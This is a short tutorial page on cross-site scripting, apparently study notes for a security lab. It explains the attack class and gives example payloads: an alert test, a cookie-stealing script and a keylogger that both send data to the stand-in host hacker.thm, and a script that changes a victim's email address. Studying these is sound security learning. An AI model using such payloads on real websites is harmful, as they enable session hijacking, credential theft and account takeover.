XSS

XSS is based on JavaScript, it would be helpful to have a basic understanding of the language and a basic understanding of Client-Server requests and responses

XSS is classified as an injection attack where malicious JavaScript gets injected into a web application with the intention of being executed by other users

Payload

There are two parts to the payload, the intention and the modification

The intention is what you wish the JavaScript to actually do

The modification is the changes to the code we need to make it execute as every scenario is different

Simple Payload

This is the most common payload used on websites to test if there's an XSS or not !

<script>alert('XSS');</script>

Session stealing

Details of a user's session, such as login tokens, are often kept in cookies on the targets machine

<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

This JavaScript takes the victim's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control, Once the hacker has these cookies, they can take over the target's session and be logged as that victim user

Keylogger

Anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details

<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>

Business Logic

This would be calling a particular network resource or a JavaScript function
For example, imagine a JavaScript function for changing the user's email address called user.changeEmail() - The payload will look something like this

<script>user.changeEmail('attacker@hacker.thm');</script>

Impact => Now that the email address for the account has changed, the attacker may perform a reset password attack

PreviousIn Password-Based Logins NextReflected XSS

Last updated 1 year ago